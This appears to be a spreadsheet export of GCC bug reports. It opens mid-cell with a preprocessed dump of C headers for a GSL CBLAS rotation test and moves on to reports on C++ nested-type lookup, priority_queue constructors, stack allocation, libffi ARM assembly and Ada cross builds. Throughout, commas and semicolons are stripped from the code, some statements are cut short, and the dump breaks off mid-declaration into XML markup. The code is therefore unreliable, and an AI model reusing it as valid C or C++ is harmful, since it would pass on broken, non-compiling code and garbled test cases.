# 338 /usr/include/stdio.h 3 4
FILE *funopen (const void * int (*)(void * char * int) int (*)(void * const
char * int) fpos_t (*)(void * fpos_t int) int (*)(void *))
int __srget (FILE *)
int __svfscanf (FILE * const char * __builtin_va_list)
int __swbuf (int FILE *)
static __inline int __sputc(int _c FILE *_p) {
        if (--_p-&gt;_w &gt;= 0 || (_p-&gt;_w &gt;= _p-&gt;_lbfsize &amp;&amp; (char)_c != '\n'))
                return (*_p-&gt;_p++ = _c)
        else
                return (__swbuf(_c _p))
}
# 23 ../gsl/gsl_ieee_utils.h 2
# 34 ../gsl/gsl_ieee_utils.h
enum {
  GSL_IEEE_TYPE_NAN = 1
  GSL_IEEE_TYPE_INF = 2
  GSL_IEEE_TYPE_NORMAL = 3
  GSL_IEEE_TYPE_DENORMAL = 4
  GSL_IEEE_TYPE_ZERO = 5
} 
typedef struct {
  int sign 
  char mantissa[24] 
  int exponent 
  int type 
} gsl_ieee_float_rep 
typedef struct {
  int sign 
  char mantissa[53] 
  int exponent 
  int type 
} gsl_ieee_double_rep 
void gsl_ieee_printf_float (const float * x) 
void gsl_ieee_printf_double (const double * x) 
void gsl_ieee_fprintf_float (FILE * stream const float * x) 
void gsl_ieee_fprintf_double (FILE * stream const double * x) 
void gsl_ieee_float_to_rep (const float * x gsl_ieee_float_rep * r) 
void gsl_ieee_double_to_rep (const double * x gsl_ieee_double_rep * r) 
enum {
  GSL_IEEE_SINGLE_PRECISION = 1
  GSL_IEEE_DOUBLE_PRECISION = 2
  GSL_IEEE_EXTENDED_PRECISION = 3
} 
enum {
  GSL_IEEE_ROUND_TO_NEAREST = 1
  GSL_IEEE_ROUND_DOWN = 2
  GSL_IEEE_ROUND_UP = 3
  GSL_IEEE_ROUND_TO_ZERO = 4
} 
enum {
  GSL_IEEE_MASK_INVALID = 1
  GSL_IEEE_MASK_DENORMALIZED = 2
  GSL_IEEE_MASK_DIVISION_BY_ZERO = 4
  GSL_IEEE_MASK_OVERFLOW = 8
  GSL_IEEE_MASK_UNDERFLOW = 16
  GSL_IEEE_MASK_ALL = 31
  GSL_IEEE_TRAP_INEXACT = 32
} 
void gsl_ieee_env_setup (void) 
int gsl_ieee_read_mode_string (const char * description int * precision
                               int * rounding int * exception_mask) 
int gsl_ieee_set_mode (int precision int rounding int exception_mask) 
# 3 test_rotg.c 2
# 1 ../gsl/gsl_math.h 1
# 22 ../gsl/gsl_math.h
# 1 /usr/gcc/gcc-3.3/lib/gcc-lib/powerpc-apple-darwin6.6/3.3/include/math.h 1 3 4
# 24 /usr/gcc/gcc-3.3/lib/gcc-lib/powerpc-apple-darwin6.6/3.3/include/math.h 3 4
# 1 /usr/include/architecture/ppc/math.h 1 3 4
# 41 /usr/include/architecture/ppc/math.h 3 4
typedef float float_t
typedef double double_t
# 55 /usr/include/architecture/ppc/math.h 3 4
enum {
        FP_NAN = 1
        FP_INFINITE = 2
        FP_ZERO = 3
        FP_NORMAL = 4
        FP_SUBNORMAL = 5
}
# 76 /usr/include/architecture/ppc/math.h 3 4
extern unsigned int __math_errhandling ( void )
# 124 /usr/include/architecture/ppc/math.h 3 4
extern long __fpclassifyd( double x )
extern long __fpclassifyf( float x )
extern long __fpclassify( long double x )
# 136 /usr/include/architecture/ppc/math.h 3 4
extern long __isnormald( double x )
extern long __isnormalf( float x )
extern long __isnormal( long double x )
# 147 /usr/include/architecture/ppc/math.h 3 4
extern long __isfinited( double x )
extern long __isfinitef( float x )
extern long __isfinite( long double x )
# 159 /usr/include/architecture/ppc/math.h 3 4
extern long __isinfd( double x )
extern long __isinff( float x )
extern long __isinf( long double x )
# 171 /usr/include/architecture/ppc/math.h 3 4
extern long __isnand( double x )
extern long __isnanf( float x )
extern long __isnan( long double x )
# 183 /usr/include/architecture/ppc/math.h 3 4
extern long __signbitd( double x )
extern long __signbitf( float x )
extern long __signbitl( long double x )
# 200 /usr/include/architecture/ppc/math.h 3 4
extern double acos( double x )
extern double asin( double x )
extern double atan( double x )
extern double atan2( double y double x )
extern double cos( double x )
extern double sin( double x )
extern double tan( double x )
extern double acosh( double x )
extern double asinh( double x )
extern double atanh( double x )
extern double cosh( double x )
extern double sinh( double x )
extern double tanh( double x )
extern double exp ( double x )
extern double exp2 ( double x )
extern double expm1 ( double x )
extern double log ( double x )
extern double log10 ( double x )
extern double log2 ( double x )
extern double log1p ( double x )
extern double logb ( double x )
extern float logbf ( float x )
extern double modf ( double x double *iptr )
extern float modff ( float x float *iptr )
extern double ldexp ( double value int exp )
extern float ldexpf ( float value int exp )
extern double frexp ( double value int *eptr )
extern float frexpf ( float value int *eptr )
extern int ilogb ( double x )
extern int ilogbf ( float x )
extern double scalbn ( double x int n )
extern float scalbnf ( float x int n )
extern double scalbln ( double x long int n )
extern float scalblnf ( float x long int n )
extern double fabs( double x )
extern float fabsf( float x )
extern double cbrt( double x )
extern double hypot ( double x double y )
extern double pow ( double x double y )
extern double sqrt( double x )
extern double erf( double x )
extern double erfc( double x )
extern double lgamma( double x )
extern double tgamma( double x )
extern double ceil ( double x )
extern float ceilf ( float x )
extern double floor ( double x )
extern float floorf ( float x )
extern double nearbyint ( double x )
extern float nearbyintf ( float x )
extern double rint ( double x )
extern float rintf ( float x )
extern long int lrint ( double x )
extern long int lrintf ( float x )
extern long long int llrint ( double x )
extern long long int llrintf ( float x )
extern double round ( double x )
extern float roundf ( float x )
extern long int lround ( double x )
extern long int lroundf ( float x )
extern long long int llround ( double x )
extern long long int llroundf ( float x )
extern double trunc ( double x )
extern float truncf ( float x )
extern double fmod ( double x double y )
extern float fmodf ( float x float y )
extern double remainder ( double x double y )
extern float remainderf ( float x float y )
extern double remquo ( double x double y int *quo )
extern float remquof ( float x float y int *quo )
extern double copysign ( double x double y )
extern float copysignf ( float x float y )
extern double nan( const char *tagp )
extern float nanf( const char *tagp )
extern double nextafter ( double x double y )
extern float nextafterf ( float x float y )
extern double fdim ( double x double y )
extern float fdimf ( float x float y )
extern double fmax ( double x double y )
extern float fmaxf ( float x float y )
extern double fmin ( double x double y )
extern float fminf ( float x float y )
extern double fma ( double x double y double z )
extern float fmaf ( float x float y float z )
# 323 /usr/include/architecture/ppc/math.h 3 4
extern double __inf( void )
extern float __inff( void )
extern float __nan( void )
extern long int rinttol ( double x )
extern long int roundtol ( double x )
typedef struct _complx {
        double Real
        double Imag
} _complex
# 360 /usr/include/architecture/ppc/math.h 3 4
extern int signgam
enum fdversion {fdlibm_ieee = -1 fdlibm_svid fdlibm_xopen fdlibm_posix}
# 375 /usr/include/architecture/ppc/math.h 3 4
extern enum fdversion _fdlib_version
struct exception {
        int type
        char *name
        double arg1
        double arg2
        double retval
}
# 412 /usr/include/architecture/ppc/math.h 3 4
extern int finite ( double x )
extern double gamma ( double x )
extern double j0 ( double x )
extern double j1 ( double x )
extern double jn ( int n double x )
extern double y0 ( double x )
extern double y1 ( double x )
extern double yn ( int n double x )
extern double scalb ( double x int n )
extern int matherr ( struct exception * )
extern double significand ( double x )
extern double cabs ( _complex z )
extern double drem ( double x double y )
# 25 /usr/gcc/gcc-3.3/lib/gcc-lib/powerpc-apple-darwin6.6/3.3/include/math.h 2 3 4
# 23 ../gsl/gsl_math.h 2
# 1 ../gsl/gsl_sys.h 1
# 33 ../gsl/gsl_sys.h
double gsl_log1p (const double x)
double gsl_expm1 (const double x)
double gsl_hypot (const double x const double y)
double gsl_acosh (const double x)
double gsl_asinh (const double x)
double gsl_atanh (const double x)
int gsl_isnan (const double x)
int gsl_isinf (const double x)
int gsl_finite (const double x)
double gsl_nan (void)
double gsl_posinf (void)
double gsl_neginf (void)
double gsl_fdiv (const double x const double y)
double gsl_coerce_double (const double x)
float gsl_coerce_float (const float x)
long double gsl_coerce_long_double (const long double x)
double gsl_ldexp(const double x const int e)
double gsl_frexp(const double x int * e)
int gsl_fcmp (const double x1 const double x2 const double epsilon)
# 24 ../gsl/gsl_math.h 2
# 1 ../gsl/gsl_machine.h 1
# 1 /usr/gcc/gcc-3.3/lib/gcc-lib/powerpc-apple-darwin6.6/3.3/include/limits.h
1 3 4
# 11 /usr/gcc/gcc-3.3/lib/gcc-lib/powerpc-apple-darwin6.6/3.3/include/limits.h 3 4
# 1
/usr/gcc/gcc-3.3/lib/gcc-lib/powerpc-apple-darwin6.6/3.3/include/syslimits.h 1 3 4
# 1 /usr/gcc/gcc-3.3/lib/gcc-lib/powerpc-apple-darwin6.6/3.3/include/limits.h
1 3 4
# 122
/usr/gcc/gcc-3.3/lib/gcc-lib/powerpc-apple-darwin6.6/3.3/include/limits.h 3 4
# 1 /usr/include/limits.h 1 3 4
# 62 /usr/include/limits.h 3 4
# 1 /usr/include/machine/limits.h 1 3 4
# 1 /usr/include/ppc/limits.h 1 3 4
# 7 /usr/include/machine/limits.h 2 3 4
# 63 /usr/include/limits.h 2 3 4
# 1 /usr/include/sys/syslimits.h 1 3 4
# 64 /usr/include/limits.h 2 3 4
# 123
/usr/gcc/gcc-3.3/lib/gcc-lib/powerpc-apple-darwin6.6/3.3/include/limits.h 2 3 4
# 8
/usr/gcc/gcc-3.3/lib/gcc-lib/powerpc-apple-darwin6.6/3.3/include/syslimits.h 2 3 4
# 12 /usr/gcc/gcc-3.3/lib/gcc-lib/powerpc-apple-darwin6.6/3.3/include/limits.h
2 3 4
# 6 ../gsl/gsl_machine.h 2
# 1 /usr/gcc/gcc-3.3/lib/gcc-lib/powerpc-apple-darwin6.6/3.3/include/float.h 1 3 4
# 7 ../gsl/gsl_machine.h 2
# 25 ../gsl/gsl_math.h 2
# 1 ../gsl/gsl_precision.h 1
# 24 ../gsl/gsl_precision.h
# 1 ../gsl/gsl_types.h 1
# 25 ../gsl/gsl_precision.h 2
# 36 ../gsl/gsl_precision.h
typedef unsigned int gsl_prec_t
# 56 ../gsl/gsl_precision.h
extern const double gsl_prec_eps[]
extern const double gsl_prec_sqrt_eps[]
extern const double gsl_prec_root3_eps[]
extern const double gsl_prec_root4_eps[]
extern const double gsl_prec_root5_eps[]
extern const double gsl_prec_root6_eps[]
# 26 ../gsl/gsl_math.h 2
# 1 ../gsl/gsl_nan.h 1
# 27 ../gsl/gsl_math.h 2
# 1 ../gsl/gsl_pow_int.h 1
# 33 ../gsl/gsl_pow_int.h
# 54 ../gsl/gsl_pow_int.h
double gsl_pow_2(const double x)
double gsl_pow_3(const double x)
double gsl_pow_4(const double x)
double gsl_pow_5(const double x)
double gsl_pow_6(const double x)
double gsl_pow_7(const double x)
double gsl_pow_8(const double x)
double gsl_pow_9(const double x)
double gsl_pow_int(double x int n)
# 28 ../gsl/gsl_math.h 2
# 108 ../gsl/gsl_math.h
# 126 ../gsl/gsl_math.h
double gsl_max (double a double b)
double gsl_min (double a double b)
# 185 ../gsl/gsl_math.h
struct gsl_function_struct
{
  double (* function) (double x void * params)
  void * params
}
typedef struct gsl_function_struct gsl_function 
struct gsl_function_fdf_struct
{
  double (* f) (double x void * params)
  double (* df) (double x void * params)
  void (* fdf) (double x void * params double * f double * df)
  void * params
}
typedef struct gsl_function_fdf_struct gsl_function_fdf 
# 214 ../gsl/gsl_math.h
struct gsl_function_vec_struct
{
  int (* function) (double x double y[] void * params)
  void * params
}
typedef struct gsl_function_vec_struct gsl_function_vec 
# 4 test_rotg.c 2
# 1 ../gsl/gsl_cblas.h 1
# 27 ../gsl/gsl_cblas.h
# 1 /usr/gcc/gcc-3.3/lib/gcc-lib/powerpc-apple-darwin6.6/3.3/include/stddef.h
1 3 4
# 151
/usr/gcc/gcc-3.3/lib/gcc-lib/powerpc-apple-darwin6.6/3.3/include/stddef.h 3 4
typedef int ptrdiff_t
# 294
/usr/gcc/gcc-3.3/lib/gcc-lib/powerpc-apple-darwin6.6/3.3/include/stddef.h 3 4
typedef int rune_t
# 325
/usr/gcc/gcc-3.3/lib/gcc-lib/powerpc-apple-darwin6.6/3.3/include/stddef.h 3 4
typedef int wchar_t
# 28 ../gsl/gsl_cblas.h 2
# 39 ../gsl/gsl_cblas.h
enum CBLAS_ORDER {CblasRowMajor=101 CblasColMajor=102}
enum CBLAS_TRANSPOSE {CblasNoTrans=111 CblasTrans=112 CblasConjTrans=113}
enum CBLAS_UPLO {CblasUpper=121 CblasLower=122}
enum CBLAS_DIAG {CblasNonUnit=131 CblasUnit=132}
enum CBLAS_SIDE {CblasLeft=141 CblasRight=142}
float cblas_sdsdot(const int N const float alpha const float *X
                    const int incX const float *Y const int incY)
double cblas_dsdot(const int N const float *X const int incX const float *Y
                   const int incY)
float cblas_sdot(const int N const float *X const int incX
                  const float *Y const int incY)
double cblas_ddot(const int N const double *X const int incX
                  const double *Y const int incY)
void cblas_cdotu_sub(const int N const void *X const int incX
                       const void *Y const int incY void *dotu)
void cblas_cdotc_sub(const int N const void *X const int incX
                       const void *Y const int incY void *dotc)
void cblas_zdotu_sub(const int N const void *X const int incX
                       const void *Y const int incY void *dotu)
void cblas_zdotc_sub(const int N const void *X const int incX
                       const void *Y const int incY void *dotc)
float cblas_snrm2(const int N const float *X const int incX)
float cblas_sasum(const int N const float *X const int incX)
double cblas_dnrm2(const int N const double *X const int incX)
double cblas_dasum(const int N const double *X const int incX)
float cblas_scnrm2(const int N const void *X const int incX)
float cblas_scasum(const int N const void *X const int incX)
double cblas_dznrm2(const int N const void *X const int incX)
double cblas_dzasum(const int N const void *X const int incX)
size_t cblas_isamax(const int N const float *X const int incX)
size_t cblas_idamax(const int N const double *X const int incX)
size_t cblas_icamax(const int N const void *X const int incX)
size_t cblas_izamax(const int N const void *X const int incX)
# 113 ../gsl/gsl_cblas.h
void cblas_sswap(const int N float *X const int incX
                 float *Y const int incY)
void cblas_scopy(const int N const float *X const int incX
                 float *Y const int incY)
void cblas_saxpy(const int N const float alpha const float *X
                 const int incX float *Y const int incY)
void cblas_dswap(const int N double *X const int incX
                 double *Y const int incY)
void cblas_dcopy(const int N const double *X const int incX
                 double *Y const int incY)
void cblas_daxpy(const int N const double alpha const double *X
                 const int incX double *Y const int incY)
void cblas_cswap(const int N void *X const int incX
                 void *Y const int incY)
void cblas_ccopy(const int N const void *X const int incX
                 void *Y const int incY)
void cblas_caxpy(const int N const void *alpha const void *X
                 const int incX void *Y const int incY)
void cblas_zswap(const int N void *X const int incX
                 void *Y const int incY)
void cblas_zcopy(const int N const void *X const int incX
                 void *Y const int incY)
void cblas_zaxpy(const int N const void *alpha const void *X
                 const int incX void *Y const int incY)
void cblas_srotg(float *a float *b float *c float *s)
void cblas_srotmg(float *d1 float *d2 float *b1 const float b2 float *P)
void cblas_srot(const int N float *X const int incX
                float *Y const int incY const float c const float s)
void cblas_srotm(const int N float *X const int incX
                float *Y const int incY const float *P)
void cblas_drotg(double *a double *b double *c double *s)
void cblas_drotmg(double *d1 double *d2 double *b1 const double b2 double *P)
void cblas_drot(const int N double *X const int incX
                double *Y const int incY const double c const double s)
void cblas_drotm(const int N double *X const int incX
                double *Y const int incY const double *P)
void cblas_sscal(const int N const float alpha float *X const int incX)
void cblas_dscal(const int N const double alpha double *X const int incX)
void cblas_cscal(const int N const void *alpha void *X const int incX)
void cblas_zscal(const int N const void *alpha void *X const int incX)
void cblas_csscal(const int N const float alpha void *X const int incX)
void cblas_zdscal(const int N const double alpha void *X const int incX)
# 179 ../gsl/gsl_cblas.h
void cblas_sgemv(const enum CBLAS_ORDER order
                 const enum CBLAS_TRANSPOSE TransA const int M const int N
                 const float alpha const float *A const int lda
                 const float *X const int incX const float beta
                 float *Y const int incY)
void cblas_sgbmv(const enum CBLAS_ORDER order
                 const enum CBLAS_TRANSPOSE TransA const int M const int N
                 const int KL const int KU const float alpha
                 const float *A const int lda const float *X
                 const int incX const float beta float *Y const int incY)
void cblas_strmv(const enum CBLAS_ORDER order const enum CBLAS_UPLO Uplo
                 const enum CBLAS_TRANSPOSE TransA const enum CBLAS_DIAG Diag
                 const int N const float *A const int lda
                 float *X const int incX)
void cblas_stbmv(const enum CBLAS_ORDER order const enum CBLAS_UPLO Uplo
                 const enum CBLAS_TRANSPOSE TransA const enum CBLAS_DIAG Diag
                 const int N const int K const float *A const int lda
                 float *X const int incX)
void cblas_stpmv(const enum CBLAS_ORDER order const enum CBLAS_UPLO Uplo
                 const enum CBLAS_TRANSPOSE TransA const enum CBLAS_DIAG Diag
                 const int N const float *Ap float *X const int incX)
void cblas_strsv(const enum CBLAS_ORDER order const enum CBLAS_UPLO Uplo
                 const enum CBLAS_TRANSPOSE TransA const enum CBLAS_DIAG Diag
                 const int N const float *A const int lda float *X
                 const int incX)
void cblas_stbsv(const enum CBLAS_ORDER order const enum CBLAS_UPLO Uplo
                 const enum CBLAS_TRANSPOSE TransA const enum CBLAS_DIAG Diag
                 const int N const int K const float *A const int lda
                 float *X const int incX)
void cblas_stpsv(const enum CBLAS_ORDER order const enum CBLAS_UPLO Uplo
                 const enum CBLAS_TRANSPOSE TransA const enum CBLAS_DIAG Diag
                 const int N const float *Ap float *X const int incX)
void cblas_dgemv(const enum CBLAS_ORDER order
                 const enum CBLAS_TRANSPOSE TransA const int M const int N
                 const double alpha const double *A const int lda
                 const double *X const int incX const double beta
                 double *Y const int incY)
void cblas_dgbmv(const enum CBLAS_ORDER order
                 const enum CBLAS_TRANSPOSE TransA const int M const int N
                 const int KL const int KU const double alpha
                 const double *A const int lda const double *X
                 const int incX const double beta double *Y const int incY)
void cblas_dtrmv(const enum CBLAS_ORDER order const enum CBLAS_UPLO Uplo
                 const enum CBLAS_TRANSPOSE TransA const enum CBLAS_DIAG Diag
                 const int N const double *A const int lda
                 double *X const int incX)
void cblas_dtbmv(const enum CBLAS_ORDER order const enum CBLAS_UPLO Uplo
                 const enum CBLAS_TRANSPOSE TransA const enum CBLAS_DIAG Diag
                 const int N const int K const double *A const int lda
                 double *X const int incX)
void cblas_dtpmv(const enum CBLAS_ORDER order const enum CBLAS_UPLO Uplo
                 const enum CBLAS_TRANSPOSE TransA const enum CBLAS_DIAG Diag
                 const int N const double *Ap double *X const int incX)
void cblas_dtrsv(const enum CBLAS_ORDER order const enum CBLAS_UPLO Uplo
                 const enum CBLAS_TRANSPOSE TransA const enum CBLAS_DIAG Diag
                 const int N const double *A const int lda double *X
                 const int incX)
void cblas_dtbsv(const enum CBLAS_ORDER order const enum CBLAS_UPLO Uplo
                 const enum CBLAS_TRANSPOSE TransA const enum CBLAS_DIAG Diag
                 const int N const int K const double *A const int lda
                 double *X const int incX)
void cblas_dtpsv(const enum CBLAS_ORDER order const enum CBLAS_UPLO Uplo
                 const enum CBLAS_TRANSPOSE TransA const enum CBLAS_DIAG Diag
                 const int N const double *Ap double *X const int incX)
void cblas_cgemv(const enum CBLAS_ORDER order
                 const enum CBLAS_TRANSPOSE TransA const int M const int N
                 const void *alpha const void *A const int lda
                 const void *X const int incX const void *beta
                 void *Y const int incY)
void cblas_cgbmv(const enum CBLAS_ORDER order
                 const enum CBLAS_TRANSPOSE TransA const int M const int N
                 const int KL const int KU const void *alpha
                 const void *A const int lda const void *X
                 const int incX const void *beta void *Y const int incY)
void cblas_ctrmv(const enum CBLAS_ORDER order const enum CBLAS_UPLO Uplo
                 const enum CBLAS_TRANSPOSE TransA const enum CBLAS_DIAG Diag
                 const int N const void *A const int lda
                 void *X const int incX)
void cblas_ctbmv(const enum CBLAS_ORDER order const enum CBLAS_UPLO Uplo
                 const enum CBLAS_TRANSPOSE TransA const enum CBLAS_DIAG Diag
                 const int N const int K const void *A const int lda
                 void *X const int incX)
void cblas_ctpmv(const enum CBLAS_ORDER order const enum CBLAS_UPLO Uplo
                 const enum CBLAS_TRANSPOSE TransA const enum CBLAS_DIAG Diag
                 const int N const void *Ap void *X const int incX)
void cblas_ctrsv(const enum CBLAS_ORDER order const enum CBLAS_UPLO Uplo
                 const enum CBLAS_TRANSPOSE TransA const enum CBLAS_DIAG Diag
                 const int N const void *A const int lda void *X
                 const int incX)
void cblas_ctbsv(const enum CBLAS_ORDER order const enum CBLAS_UPLO Uplo
                 const enum CBLAS_TRANSPOSE TransA const enum CBLAS_DIAG Diag
                 const int N const int K const void *A const int lda
                 void *X const int incX)
void cblas_ctpsv(const enum CBLAS_ORDER order const enum CBLAS_UPLO Uplo
                 const enum CBLAS_TRANSPOSE TransA const enum CBLAS_DIAG Diag
                 const int N const void *Ap void *X const int incX)
void cblas_zgemv(const enum CBLAS_ORDER order
                 const enum CBLAS_TRANSPOSE TransA const int M const int N
                 const void *alpha const void *A const int lda
                 const void *X const int incX const void *beta
                 void *Y const int incY)
void cblas_zgbmv(const enum CBLAS_ORDER order
                 const enum CBLAS_TRANSPOSE TransA const int M const int N
                 const int KL const int KU const void *alpha
                 const void *A const int lda const void *X
                 const int incX const void *beta void *Y const int incY)
void cblas_ztrmv(const enum CBLAS_ORDER order const enum CBLAS_UPLO Uplo
                 const enum CBLAS_TRANSPOSE TransA const enum CBLAS_DIAG Diag
                 const int N const void *A const int lda
                 void *X const int incX)
void cblas_ztbmv(const enum CBLAS_ORDER order const enum CBLAS_UPLO Uplo
                 const enum CBLAS_TRANSPOSE TransA const enum CBLAS_DIAG Diag
                 const int N const int K const void *A const int lda
                 void *X const int incX)
void cblas_ztpmv(const enum CBLAS_O</t>
  </si>
  <si>
    <t>jleffler</t>
  </si>
  <si>
    <t>GCC-3</t>
  </si>
  <si>
    <t>Nested types sometimes not visible</t>
  </si>
  <si>
    <t>The qualified version of a nested type is sometimes not visible
during the definition of the containing class. See the example.
this gives
nathan46.C:25: no type named `F' in `struct A'
What appears to be happening is that during the lookup of D::F's base class
`D::Parent::F' `D::Parent' finds `B::Parent' because
the typedef on line 24 has not injected the name into D's scope.
Strangely C::F is understood as the empty struct C::G defined
just prior appears to cause the name injection.
[I'll submit this independantly to the list but let's see how
this bug tracker works :-)]
Release:
CVS
Environment:
i686-pc-linux-gnu
How-To-Repeat:
// Copyright (C) 1999 Free Software Foundation Inc.
// Contributed by Nathan Sidwell 25 Aug 1999 
// typenames are not injected early enough
struct A {
}
struct B : A {
  typedef A Parent
  struct F {
  }
}
struct C : B {
  typedef B Parent
  struct G {}
  struct F : C::Parent::F {
    typedef C::Parent::F Parent
  }
}
struct D : B {
  typedef B Parent
  struct F : D::Parent::F {
    typedef D::Parent::F Parent
  }
}</t>
  </si>
  <si>
    <t>GCC-70101</t>
  </si>
  <si>
    <t>Allocator-extended priority_queue constructors are badly broken</t>
  </si>
  <si>
    <t>None of them is implemented correctly and several won't compile if actually used.
      template&gt;
	explicit
	priority_queue(const _Alloc&amp; __a)
	: c(__a) { }
should be : c(__a) comp() (the standard says that it value-initializes comp).
      template&gt;
	priority_queue(const _Compare&amp; __x const _Alloc&amp; __a)
	: c(__x __a) { }
should be : c(__a) comp(__x).
      template&gt;
	priority_queue(const _Compare&amp; __x const _Sequence&amp; __c
		       const _Alloc&amp; __a)
	: c(__x __c __a) { }
should be : c(__c __a) comp(__x) and per LWG 2537 should also call std::make_heap.
      template&gt;
	priority_queue(const _Compare&amp; __x _Sequence&amp;&amp; __c const _Alloc&amp; __a)
	: c(__x std::move(__c) __a) { }
should be : c(std::move(__c) __a) comp(__x) and per LWG 2537 should also call std::make_heap.
      template&gt;
	priority_queue(const priority_queue&amp; __q const _Alloc&amp; __a)
	: c(__q.c __a) { }
should be : c(__q.c __a) comp(__q.comp).
      template&gt;
	priority_queue(priority_queue&amp;&amp; __q const _Alloc&amp; __a)
	: c(std::move(__q.c) __a) { }
should be : c(std::move(__q.c) __a) comp(std::move(__q.comp)).</t>
  </si>
  <si>
    <t>rs2740</t>
  </si>
  <si>
    <t>GCC-37166</t>
  </si>
  <si>
    <t>variable is still committed to stack even though it is not aliased</t>
  </si>
  <si>
    <t>Testcase:
struct f { int a }
int g(struct f *b struct f *c)
{
  struct f g
  if (!b) {
    b = 
    b-&gt;a = c-&gt;a + 1
    c-&gt;a = c-&gt;a + 1
  }
  else if (!c) {
    c = 
    c-&gt;a = b-&gt;a + 1
    b-&gt;a = b-&gt;a + 1
  }
  return c-&gt;a + b-&gt;a
}
--- CUT ---
After some changes on the trunk we get:
:
  if (b == 0B)
    goto 
  else
    goto 
:
  g.a = [plus_expr] c-&gt;a + 1
  prephitmp.13 = c-&gt;a + 1
  c-&gt;a = prephitmp.13
  prephitmp.25 = g.a
  goto 
:
  if (c == 0B)
    goto 
  else
    goto 
:
  prephitmp.13 = c-&gt;a
  prephitmp.25 = b-&gt;a
  goto 
:
  g.a = [plus_expr] b-&gt;a + 1
  prephitmp.25 = b-&gt;a + 1
  b-&gt;a = prephitmp.25
  prephitmp.13 = g.a
:
  return prephitmp.25 + prephitmp.13
--- CUT ---
Notice how g.a is still referenced.  This comes from 
  # b_1 = PHI 
Being in the IR after PRE even though b_1 is no longer referenced.
So for 32bit PPC we get a stack adjustment:
        stwu %r1-32(%r1)
..
        addi %r1%r132
Even though there is no need for this adjustment as nothing touches the stack but the variable g is still being marked with TREE_ADDRESSABLE as evident by:
Partition 0: size 4 align 4
        g offset 0
in the .expand dump.</t>
  </si>
  <si>
    <t>GCC-40242</t>
  </si>
  <si>
    <t>unsupported asm instructions in libffi/src/arm/sysv.S</t>
  </si>
  <si>
    <t>Hello
during cross compilation of gcc the libffi build for the target breaks with this error message:
libtool: compile:  /home/frogger/pengutronix/toolchain/libffi/build/./gcc/xgcc -B/home/frogger/pengutronix/toolchain/libffi/build/./gcc/ -B/usr/local/arm-1136jfs-linux-gnueabi/bin/ -B/usr/local/arm-1136jfs-linux-gnueabi/lib/ -isystem /usr/local/arm-1136jfs-linux-gnueabi/include -isystem /usr/local/arm-1136jfs-linux-gnueabi/sys-include -I. -I../../../gcc-4.4.0/libffi/include -Iinclude -I../../../gcc-4.4.0/libffi/src -g -O2 -c ../../../gcc-4.4.0/libffi/src/arm/sysv.S  -fPIC -DPIC -o src/arm/.libs/sysv.o
../../../gcc-4.4.0/libffi/src/arm/sysv.S: Assembler messages:
../../../gcc-4.4.0/libffi/src/arm/sysv.S:202: Error: selected processor does not support `stfeqs f0[r2]'
../../../gcc-4.4.0/libffi/src/arm/sysv.S:207: Error: selected processor does not support `stfeqd f0[r2]'
../../../gcc-4.4.0/libffi/src/arm/sysv.S:282: Error: selected processor does not support `ldfs f0[sp]'
../../../gcc-4.4.0/libffi/src/arm/sysv.S:285: Error: selected processor does not support `ldfd f0[sp]'
../../../gcc-4.4.0/libffi/src/arm/sysv.S:288: Error: selected processor does not support `ldfd f0[sp]'
the offending code is:
#ifndef __SOFTFP__
        beq     LSYM(Lepilogue)
@ return FLOAT
        cmp     r3 #FFI_TYPE_FLOAT
        stfeqs  f0 [r2]
        beq     LSYM(Lepilogue)
@ return DOUBLE or LONGDOUBLE
        cmp     r3 #FFI_TYPE_DOUBLE
        stfeqd  f0 [r2]
#endif
gcc is configured this way:
../gcc-4.4.0/configure --enable-languages=cc++java --target=arm-1136jfs-linux-gnueabi --with-mpfr=/home/frogger/pengutronix/toolchain/OSELAS.Toolchain-trunk/platform-arm-v4t-linux-gnueabi-gcc-4.4.0-glibc-2.9-binutils-2.19.1-kernel-2.6.29-sanitized/sysroot-host --with-gmp=/home/frogger/pengutronix/toolchain/OSELAS.Toolchain-trunk/platform-arm-v4t-linux-gnueabi-gcc-4.4.0-glibc-2.9-binutils-2.19.1-kernel-2.6.29-sanitized/sysroot-host --with-float=softfp --with-fpu=vfp  --with-cpu=arm1136jf-s --with-sysroot=/opt/OSELAS.Toolchain-1.99.3/arm-1136jfs-linux-gnueabi/gcc-4.3.2-glibc-2.8-binutils-2.19-kernel-2.6.27-sanitized/sysroot-arm-1136jfs-linux-gnueabi
I.e. as an arm-eabi target --with-fpu=vfp and --with-float=softfp. Which means floats are passed in integer registers but in function the compiler generates floating point instructions the preprocessor doesn't define a __SOFTFP__ symbol.
If configuring the compiler with --with-float=soft it will pass floats in integer registers and it will generate softfloat emulation code. In this case the preprocessor defines __SOFTFP__.
In both variants the function calling convention is the same but in one case we have the __SOFTFP__ symbol in the other not.
libffi changes it's behaviour depending on this symbol which is IMHO not correct.
I've tested some combinations this is the summary of
(echo | arm-v4t-linux-gnueabi-cpp -dM -mfloat-abi=XXX -mfpu=YYY| egrep -i 'vfp|fp|soft|hard|float'):
-mfloat-abi=soft   -mfpu=vfp    __SOFTFP__ __VFP_FP__
-mfloat-abi=softfp -mfpu=vfp               __VFP_FP__
-mfloat-abi=hard   -mfpu=vfp               __VFP_FP__ (sorry unimplemented)
-mfloat-abi=soft   -mfpu=fpa    __SOFTFP__
-mfloat-abi=softfp -mfpu=fpa
-mfloat-abi=hard   -mfpu=fpa
I'm not sure which of these combinations makes sense or are actually used the 3rd one seems not to be implemented though. We at pengutronix use usually 1. and 2. In some weird projects 4. and 6. but not with the current gcc.
This table shows that it's not possible to distinguish between the hard and softfp case a diff off the preprocessor's output shows no difference in the symbols tough. On the upside the vfp-hard case seems not to be implemented.
So the question is which is the correct symbol for libffi?
cheers Marc</t>
  </si>
  <si>
    <t>mkl</t>
  </si>
  <si>
    <t>GCC-80921</t>
  </si>
  <si>
    <t>cross compiling fails to build Ada shared libraries</t>
  </si>
  <si>
    <t>Working on a GNU/Linux host my goal is to deliver a crossed-native GCC build for deployment on MS-Windows32 hosts.  Currently focussing on GCC-6.3.0 I have:
1) Bootstrapped and installed native Ada-enabled GCC-6.3.0 for the GNU/Linux host.
2) With (1) at start of $PATH built and installed GNU/Linux hosted GCC-6.3.0 cross-comiler suite for the mingw32 target.
3) With (1) still at the start of $PATH followed by (2) built and installed (into a local staging directory) GCC-6.3.0 suite for host = target = mingw32.
